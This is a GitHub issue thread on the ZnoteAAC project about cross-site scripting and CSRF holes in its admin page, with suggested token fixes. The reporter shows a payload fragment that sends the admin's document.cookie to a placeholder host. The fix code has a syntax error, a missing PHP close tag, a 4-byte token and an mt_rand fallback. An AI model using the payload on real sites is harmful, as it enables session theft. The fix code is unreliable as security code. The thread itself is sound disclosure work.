### ISSUE TITLE
XSS admin.php

### ISSUE THREAD

**Issue by rwxsu** [Znote/ZnoteAAC#361]
`// Don't bother to think about cross site scripting here, since they can't access the page unless they are admin anyway.` at [admin.php#L6](https://github.com/Znote/ZnoteAAC/blob/master/admin.php#L6)

Let's say you tricked the admin with a non-persistent XSS attack (search field, whatever...) and you gain admin access.

If you can then inject `xx.xx.xx.xx/index.php?xss="+document.cookie` in the admin page, you *always* know it's the admin that's sending the cookie and you gain access over and over again.

**Comment by divinity76** [comment]
yeah, it is vulnerable to XSS, but perhaps more worringly, in the absence of CSRF tokens or anything like it, the admin page here is also vulnerable to [CSRF](https://en.wikipedia.org/wiki/Cross-site_request_forgery) - a malicious site could trick a logged-in admin into deleting any character by just making the admin visit a page - and have the page run evil char-deleting javascript in the background.

**Comment by Znote** [comment]
Any suggested solutions?

Google recaptcha verification before you can access any page that calls the admin check functions?

https://github.com/Znote/ZnoteAAC/blob/master/engine/function/general.php#L395-L411

**Comment by divinity76** [comment]
nono, you just need a 
$_SESSION['csrf_token']=bin2hex(random_bytes(4));

then add a `<input type="hidden" name="csrf_token" value="<?php echo $_SESSION['csrf_token'];" />` and then when doing admin actions, verify that the csrf token in $_POST is the same as $_SESSION['csrf_token'] - or abort with a HTTP 400 if it isn't.

**Comment by divinity76** [comment]
... don't actually use random_bytes() tho, it's a PHP >= 7.0.0 function, use openssl_random_pseudo_bytes() or something instead, as long as we need PHP5 compatibility

**Comment by divinity76** [comment]
here is a php5 and php7-compatible version of random_bytes(): 
```php
// php5-compatibile version of php7's random_bytes()
// $crypto_strong:  a boolean value that determines if the algorithm used was "cryptographically strong"
function random_bytes_compat($length, &$crypto_strong=null){
$crypto_strong=false;
if(!is_int($length)){
    throw new \InvalidArgumentException("argument 1 must be an int, is ".gettype($length));
}
if($length<0){
    throw new \InvalidArgumentException("length must be >= 0");
}
if(is_callable("random_bytes"){
$crypto_strong=true;
return random_bytes($length);
}
if(is_callable("openssl_random_pseudo_bytes")){
return openssl_random_pseudo_bytes($length,$crypto_strong);
}
// fallback to non-cryptographically-secure mt_rand() implementation...
$crypto_strong=false;
$ret="";
for($i=0;$i<$length;++$i){
$ret.=chr(mt_rand(0,255));
}
return $ret;
}
```

**Comment by Znote** [comment]
Solved in #367
